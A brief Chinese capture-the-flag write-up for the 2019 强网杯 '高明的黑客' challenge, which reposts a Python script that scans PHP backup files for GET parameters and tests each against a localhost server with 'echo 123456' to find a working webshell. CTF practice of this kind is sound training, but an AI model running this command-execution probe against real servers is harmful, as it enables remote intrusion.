[强网杯 2019]高明的黑客

下载备份文件，每个文件都有shell，但是好多都不能用，

所以需要py脚本筛选可用的shell，搬移一个大佬的wp

import re
import os
import requests

files = os.listdir('src/')    #获取路径下的所有文件
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])')   #设置正则
for i in files:                #从第一个文件开始
    url = "http://127.0.0.1/src/" + i
    f = open("src/"+i)        #打开这个文件
    data = f.read()           #读取文件内容
    f.close()                 #关闭文件
    result = reg.findall(data)  #从文件中找到GET请求
    for j in result:           #从第一个GET参数开始
        payload = url + "?" + j + "=echo 123456"   ##尝试请求次路径，并执行命令
        print(payload)
        html = requests.get(payload)##通过r=request.get（url）构造一个向服务器请求资源的url对象。
        if "123456" in html.text:
            print(payload)
            exit(1)

考察的还是脚本编写。好好理解这个